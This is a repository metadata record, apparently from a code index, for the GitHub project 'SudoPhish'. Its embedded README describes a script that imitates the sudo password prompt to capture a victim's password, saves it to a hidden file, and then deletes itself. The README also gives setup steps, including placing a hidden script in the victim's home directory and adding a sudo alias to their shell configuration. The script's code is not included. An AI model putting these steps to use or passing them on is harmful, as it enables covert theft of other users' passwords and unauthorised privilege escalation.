{"id":18086460,"url":"https://github.com/michaeldim02/sudophish","last_synced_at":"2025-04-06T00:44:13.311Z","repository":{"id":124631914,"uuid":"384053865","full_name":"MichaelDim02/SudoPhish","owner":"MichaelDim02","description":"A short script to phish passwords on  your system","archived":false,"fork":false,"pushed_at":"2021-07-08T20:53:29.000Z","size":26,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-02-12T06:57:26.927Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/MichaelDim02.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"MichaelDim02"}},"created_at":"2021-07-08T08:24:29.000Z","updated_at":"2024-10-09T17:38:49.000Z","dependencies_parsed_at":null,"dependency_job_id":"875fe41f-273c-4a5c-95d5-53ecced9ad8c","html_url":"https://github.com/MichaelDim02/SudoPhish","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MichaelDim02%2FSudoPhish","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MichaelDim02%2FSudoPhish/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MichaelDim02%2FSudoPhish/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MichaelDim02%2FSudoPhish/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/MichaelDim02","download_url":"https://codeload.github.com/MichaelDim02/SudoPhish/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247419815,"owners_count":20936012,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-31T16:08:06.203Z","updated_at":"2025-04-06T00:44:13.299Z","avatar_url":"https://github.com/MichaelDim02.png","language":"Shell","funding_links":["https://github.com/sponsors/MichaelDim02"],"categories":[],"sub_categories":[],"readme":"# SudoPhish\nA short self-destructive script to phish the passwords of the users on your system.\n\n# What it does\n+ It pretends to be the Sudo password prompt and asks the victim for their password\n+ Saves the password in a text file ( ```~/.pwd``` )\n+ Redirects the user to real sudo\n+ Self-destructs\n\n# How to set up manually\n+ Make sure you edit the shabang according to the users interactive SH. If they use bash, make sure the script starts with ```#!/bin/bash```, if they use zsh, then make sure it starts with ```#!/bin/zsh``` etc. It does not work with fish. Default is bash.\n+ Set the ```$shellfile``` variable accordingly (line 21). Default is ```\".bashrc\"```\n+ Put the following line at the END of the Shell config file: ``` alias sudo=\".sp.sh; sudo\" ```\n+ Move the file to the victims home directory, rename it to ```.sp.sh``` and give it executable permission with ```chmod +x .sp.sh```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmichaeldim02%2Fsudophish","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmichaeldim02%2Fsudophish","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmichaeldim02%2Fsudophish/lists"}